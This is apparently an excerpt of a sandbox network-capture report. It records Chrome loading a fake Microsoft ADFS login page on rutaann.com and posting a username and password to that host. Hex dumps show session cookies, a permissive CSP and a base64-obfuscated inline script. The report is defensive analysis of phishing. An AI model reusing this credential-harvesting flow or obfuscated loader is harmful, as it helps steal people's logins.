                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://rutaann.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:56 UTC3180OUTData Raw: 5b 7b 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 33 2d 32 35 54 32 30 3a 32 39 3a 35 34 2e 36 33 38 5a 22 2c 22 69 4b 65 79 22 3a 22 62 36 39 38 32 64 35 65 2d 64 65 38 32 2d 34 32 66 38 2d 39 39 39 31 2d 61 62 35 64 36 37 36 62 61 32 32 39 22 2c 22 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 2e 41 70 70 6c 69 63 61 74 69 6f 6e 49 6e 73 69 67 68 74 73 2e 62 36 39 38 32 64 35 65 64 65 38 32 34 32 66 38 39 39 39 31 61 62 35 64 36 37 36 62 61 32 32 39 2e 45 76 65 6e 74 22 2c 22 74 61 67 73 22 3a 7b 22 61 69 2e 73 65 73 73 69 6f 6e 2e 69 64 22 3a 22 6d 71 53 52 68 22 2c 22 61 69 2e 73 65 73 73 69 6f 6e 2e 69 73 46 69 72 73 74 22 3a 22 74 72 75 65 22 2c 22 61 69 2e 64 65 76 69 63 65 2e 69 64 22 3a 22 62 72 6f 77 73 65 72 22 2c 22 61 69 2e 64 65 76 69 63 65
                                                        Data Ascii: [{"time":"2025-03-25T20:29:54.638Z","iKey":"b6982d5e-de82-42f8-9991-ab5d676ba229","name":"Microsoft.ApplicationInsights.b6982d5ede8242f89991ab5d676ba229.Event","tags":{"ai.session.id":"mqSRh","ai.session.isFirst":"true","ai.device.id":"browser","ai.device
                                                        2025-03-25 20:29:57 UTC291INHTTP/1.1 200 OK
                                                        Transfer-Encoding: chunked
                                                        Content-Type: application/json; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-Content-Type-Options: nosniff
                                                        Access-Control-Allow-Origin: *
                                                        Date: Tue, 25 Mar 2025 20:29:56 GMT
                                                        Connection: close
                                                        2025-03-25 20:29:57 UTC102INData Raw: 36 30 0d 0a 7b 22 69 74 65 6d 73 52 65 63 65 69 76 65 64 22 3a 33 2c 22 69 74 65 6d 73 41 63 63 65 70 74 65 64 22 3a 33 2c 22 61 70 70 49 64 22 3a 22 31 34 38 39 37 37 66 38 2d 38 31 37 34 2d 34 39 35 39 2d 62 65 65 63 2d 36 39 64 64 63 35 66 30 39 31 38 32 22 2c 22 65 72 72 6f 72 73 22 3a 5b 5d 7d 0d 0a
                                                        Data Ascii: 60{"itemsReceived":3,"itemsAccepted":3,"appId":"148977f8-8174-4959-beec-69ddc5f09182","errors":[]}
                                                        2025-03-25 20:29:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        43192.168.2.44978852.179.73.57443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:56 UTC638OUTPOST /v2/track HTTP/1.1
                                                        Host: dc.services.visualstudio.com
                                                        Connection: keep-alive
                                                        Content-Length: 1147
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        Content-type: application/json
                                                        Sdk-Context: appId
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Origin: https://rutaann.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://rutaann.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:56 UTC1147OUTData Raw: 5b 7b 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 33 2d 32 35 54 32 30 3a 32 39 3a 35 34 2e 38 33 30 5a 22 2c 22 69 4b 65 79 22 3a 22 62 36 39 38 32 64 35 65 2d 64 65 38 32 2d 34 32 66 38 2d 39 39 39 31 2d 61 62 35 64 36 37 36 62 61 32 32 39 22 2c 22 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 2e 41 70 70 6c 69 63 61 74 69 6f 6e 49 6e 73 69 67 68 74 73 2e 62 36 39 38 32 64 35 65 64 65 38 32 34 32 66 38 39 39 39 31 61 62 35 64 36 37 36 62 61 32 32 39 2e 50 61 67 65 76 69 65 77 22 2c 22 74 61 67 73 22 3a 7b 22 61 69 2e 73 65 73 73 69 6f 6e 2e 69 64 22 3a 22 6d 71 53 52 68 22 2c 22 61 69 2e 73 65 73 73 69 6f 6e 2e 69 73 46 69 72 73 74 22 3a 22 74 72 75 65 22 2c 22 61 69 2e 64 65 76 69 63 65 2e 69 64 22 3a 22 62 72 6f 77 73 65 72 22 2c 22 61 69 2e 64 65 76
                                                        Data Ascii: [{"time":"2025-03-25T20:29:54.830Z","iKey":"b6982d5e-de82-42f8-9991-ab5d676ba229","name":"Microsoft.ApplicationInsights.b6982d5ede8242f89991ab5d676ba229.Pageview","tags":{"ai.session.id":"mqSRh","ai.session.isFirst":"true","ai.device.id":"browser","ai.dev
                                                        2025-03-25 20:29:57 UTC291INHTTP/1.1 200 OK
                                                        Transfer-Encoding: chunked
                                                        Content-Type: application/json; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-Content-Type-Options: nosniff
                                                        Access-Control-Allow-Origin: *
                                                        Date: Tue, 25 Mar 2025 20:29:56 GMT
                                                        Connection: close
                                                        2025-03-25 20:29:57 UTC102INData Raw: 36 30 0d 0a 7b 22 69 74 65 6d 73 52 65 63 65 69 76 65 64 22 3a 31 2c 22 69 74 65 6d 73 41 63 63 65 70 74 65 64 22 3a 31 2c 22 61 70 70 49 64 22 3a 22 31 34 38 39 37 37 66 38 2d 38 31 37 34 2d 34 39 35 39 2d 62 65 65 63 2d 36 39 64 64 63 35 66 30 39 31 38 32 22 2c 22 65 72 72 6f 72 73 22 3a 5b 5d 7d 0d 0a
                                                        Data Ascii: 60{"itemsReceived":1,"itemsAccepted":1,"appId":"148977f8-8174-4959-beec-69ddc5f09182","errors":[]}
                                                        2025-03-25 20:29:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        44192.168.2.449789103.114.43.73443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:57 UTC1974OUTGET /adfs/portal/illustration/illustration.jpg?id=D8F5AB3E00202FD3B45BE1ACD95D677B137064001E171BC79B06826D98F1E1D3 HTTP/1.1
                                                        Host: rutaann.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEq [TRUNCATED]
                                                        2025-03-25 20:29:58 UTC289INHTTP/1.1 200 OK
                                                        Content-Length: 17453
                                                        Content-Type: image/jpeg
                                                        Expires: Thu, 24 Apr 2025 20:29:57 GMT
                                                        ETag: D8F5AB3E00202FD3B45BE1ACD95D677B137064001E171BC79B06826D98F1E1D3
                                                        Server: Microsoft-HTTPAPI/2.0 Microsoft-HTTPAPI/2.0
                                                        Date: Tue, 25 Mar 2025 20:29:57 GMT
                                                        Connection: close
                                                        2025-03-25 20:29:58 UTC16095INData Raw: ff d8 ff e1 09 50 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 32 20 37 39 2e 31 36 30 39 32 34 2c 20 32 30 31 37 2f 30 37 2f 31 33 2d 30 31 3a 30 36 3a 33 39 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f 32 32 2d 72 64 66 2d 73 79 6e
                                                        Data Ascii: Phttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syn
                                                        2025-03-25 20:29:58 UTC1358INData Raw: 00 14 00 10 01 54 45 41 00 14 14 00 00 00 00 05 51 00 00 00 05 45 40 00 01 41 ff d5 dc 00 74 61 05 41 00 80 08 a0 20 00 00 00 00 84 54 01 14 04 15 00 00 00 04 00 50 45 01 05 84 04 08 00 00 00 00 00 00 00 00 00 02 42 28 09 05 01 05 01 05 0a 20 a4 04 08 40 05 40 51 14 50 00 00 00 01 00 05 00 41 50 00 50 00 00 00 00 00 00 45 15 14 00 00 00 00 00 01 00 00 00 00 14 01 14 01 04 55 00 00 10 00 00 00 51 04 14 00 00 00 00 00 45 00 00 00 00 40 00 05 40 55 00 00 10 51 14 00 00 01 14 00 00 10 11 40 41 41 50 54 10 01 01 51 45 45 40 14 04 00 01 15 15 00 01 40 00 00 04 51 15 05 40 00 00 00 00 40 00 00 10 51 01 54 00 45 10 14 01 50 51 04 51 01 44 00 00 00 04 05 14 00 00 01 00 00 00 00 14 00 00 05 00 40 54 15 51 14 00 00 00 00 05 01 15 14 00 01 40 04 05 40 14 00 01 ff d6
                                                        Data Ascii: TEAQE@AtaA TPEB( @@QPAPPEUQE@@UQ@AAPTQEE@@Q@@QTEPQQD@TQ@@


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        45192.168.2.44979052.179.73.57443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:57 UTC400OUTGET /v2/track HTTP/1.1
                                                        Host: dc.services.visualstudio.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:57 UTC232INHTTP/1.1 405 Method Not Allowed
                                                        Allow: POST
                                                        Content-Length: 0
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-Content-Type-Options: nosniff
                                                        Date: Tue, 25 Mar 2025 20:29:57 GMT
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        46192.168.2.44979152.179.73.57443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:57 UTC400OUTGET /v2/track HTTP/1.1
                                                        Host: dc.services.visualstudio.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:58 UTC232INHTTP/1.1 405 Method Not Allowed
                                                        Allow: POST
                                                        Content-Length: 0
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-Content-Type-Options: nosniff
                                                        Date: Tue, 25 Mar 2025 20:29:57 GMT
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        47192.168.2.449793103.114.43.73443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:30:16 UTC3505OUTPOST /adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest%3DrQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0 HTTP/1.1
                                                        Host: rutaann.com
                                                        Connection: keep-alive
                                                        Content-Length: 103
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://rutaann.com
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; esctx-x1Q4YHmX7Q=AQABCQEAAABVrSpeuWamRam2jAF1XRQEWZj2fQ7dGK-_JxX9OHqQ2yCGiNwlWOCzJKmxCEEte8mYCgSV5ztuS4rrS9yIybFvLW3OilTD3ukCq_Zy7tmDRFx0WFi5NEghPKriToZsCQDoMeR9ncyPFOGcrJSTKxWCvaLtJqw5HnEBdZkE9U_rhSAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEFFUhOjHU_curTWGESL1hbgmAr-Cseos40vOpPWOwXYTc9UUbYwGF50h8-IldcOMc-E4ioDSHbdRao7xiUZLpiT7ecfB6bAs7xbu40qc3QG-G6zN1Oh__OGbZDYOXAwxgqU5I80Xc68VxC4k7N_9jN1Ksw9bIE-21A_9Q9qBxoYcgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AQoAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAKAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEiJYeYalAAVl3PxPvLe92WUyJQG-00-bDdyt4U5gvvctc__S4jhyXqSVwbtaNdT-hCRkYvtvLiPTlhOrlf1F8Ji03vGRNKUTAFYHnXbgo9UAgAA; ESTSWCTXFLOWTOKEN=AQABIQEAAABVrSpeuWamRam2jAF1XRQEcUeYHkXBwbpOjpfmrw1uEj9uFj_RNrxrvyBdMR-ZRy-zj0-R1puIn96jDjWIZkvzpE5Aeup7hbhxbvYm-Zx4L2h9fKoyTwKmGDdQrkOZOe16nW5CTa_kCyMU8zaji9tfWdbevmAE-CscYD9ChsFZzZlk5WdxNltcmuOZ8l9Vcg1Ijg5UcFAdFeSeT4EuvEq [TRUNCATED]
                                                        2025-03-25 20:30:16 UTC103OUTData Raw: 55 73 65 72 4e 61 6d 65 3d 6a 6f 68 6e 2e 73 6d 69 74 68 25 34 30 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 26 4b 6d 73 69 3d 26 41 75 74 68 4d 65 74 68 6f 64 3d 46 6f 72 6d 73 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 26 50 61 73 73 77 6f 72 64 3d 6f 25 33 41 25 37 42 36 6e 25 35 44 25 33 45 4f 25 32 36 2a 38
                                                        Data Ascii: UserName=john.smith%40microsoft.com&Kmsi=&AuthMethod=FormsAuthentication&Password=o%3A%7B6n%5D%3EO%26*8
                                                        2025-03-25 20:30:17 UTC849INHTTP/1.1 200 OK
                                                        Cache-Control: no-cache,no-store
                                                        Pragma: no-cache
                                                        content-length: 61809
                                                        Content-Type: text/html; charset=utf-8
                                                        Expires: -1
                                                        Server: Microsoft-HTTPAPI/2.0 Microsoft-HTTPAPI/2.0
                                                        Date: Tue, 25 Mar 2025 20:30:17 GMT
                                                        Connection: close
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                        2025-03-25 20:30:17 UTC15535INData Raw: 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 33 56 7a 64 47 39 74 52 6e 56 75 59 33 52 70 62 32 34 6f 4b 53 42 37 43 69 41 67 49 43 42 70 5a 69 41 6f 49 57 52 76 59 33 56 74 5a 57 35 30 4c 6e 46 31 5a 58 4a 35 55 32 56 73 5a 57 4e 30 62 33 49 6f 49 69 35 6a 64 58 4e 30 62 32 30 74 59 32 78 68 63 33 4d 69 4b 53 42 38 66 43 41 68 5a 47 39 6a 64 57 31 6c 62 6e 51 75 63 58 56 6c 63 6e 6c 54 5a 57 78 6c 59 33 52 76 63 69 67 69 4c 6e 4a 76 64 47 46 30 5a 53 31 6a 62 47 46 7a 63 79 49 70 4b 53 42 37
                                                        Data Ascii: <!DOCTYPE html><html lang="en-US"> <head><script src="data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG9jdW1lbnQucXVlcnlTZWxlY3RvcigiLnJvdGF0ZS1jbGFzcyIpKSB7
                                                        2025-03-25 20:30:17 UTC16384INData Raw: 76 61 72 20 6b 6d 73 69 49 6e 70 75 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6b 6d 73 69 49 6e 70 75 74 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 69 64 42 61 6e 6e 65 72 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 64 42 61 6e 6e 65 72 2e 69 6e 6e 65 72 54 65 78 74 20 3d 20 75 73 65 72 6e 61 6d 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 69 64 42 61 6e 6e 65 72 4f 70 74 69 6f 6e 73 50 61 67 65 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 64 42 61 6e 6e 65 72 4f 70 74 69 6f 6e 73 50 61 67 65 2e 69 6e 6e 65 72 54 65 78 74 20 3d 20 75 73 65 72 6e 61 6d 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20
                                                        Data Ascii: var kmsiInput = document.getElementById("kmsiInput"); if (idBanner) { idBanner.innerText = username; } if (idBannerOptionsPage) { idBannerOptionsPage.innerText = username; }
                                                        2025-03-25 20:30:17 UTC16384INData Raw: 20 20 20 74 6f 70 3a 20 31 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 30 2e 39 73 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6f 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 30 2e 39 73 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 30 2e 39 73 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 30 2e 39 73 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 30 2e 39 73 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 23 66 72 6f 74 61 74 65 47 5f 30 35 20 7b 0d 0a 20 20 20
                                                        Data Ascii: top: 15px; animation-delay: 0.9s; -o-animation-delay: 0.9s; -ms-animation-delay: 0.9s; -webkit-animation-delay: 0.9s; -moz-animation-delay: 0.9s; } #frotateG_05 {
                                                        2025-03-25 20:30:17 UTC13506INData Raw: 72 3a 20 54 65 6c 65 6d 65 74 72 79 4d 61 6e 61 67 65 72 2e 50 72 6f 64 75 63 65 50 61 67 65 44 65 74 65 63 74 69 6f 6e 54 65 6c 65 6d 65 74 72 79 22 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2f 2f 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 47 65 6e 65 72 69 63 20 50 61 67 65 20 76 69 65 77 20 74 72 61 63 6b 69 6e 67 20 0d 0a 20 20 20 20 20 20 20 20 2f 2f 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 61 70 70 49 6e 73 69 67 68 74 73 2e 74 72 61 63 6b 50 61 67 65 56 69 65 77 28 22 47 65 6e 65 72 69 63 22 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2f 2f 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 48 6f 6d 65 20 52 65 61 6c 6d 20 44 69 73 63 6f 76 65 72 79 20 50 61 67 65 0d 0a 20 20 20 20 20 20 20 20 2f 2f 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 68 72 64 20 3d
                                                        Data Ascii: r: TelemetryManager.ProducePageDetectionTelemetry"); // // Generic Page view tracking // window.appInsights.trackPageView("Generic"); // // Home Realm Discovery Page // var hrd =


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        48192.168.2.449794103.114.43.73443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:30:17 UTC2706OUTGET /adfs/portal/css/style.css?id=A7618A91AF9831C8CDF5863B4179236EC332904F166B2A3D6BF41BE9F87FCC37 HTTP/1.1
                                                        Host: rutaann.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest%3DrQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
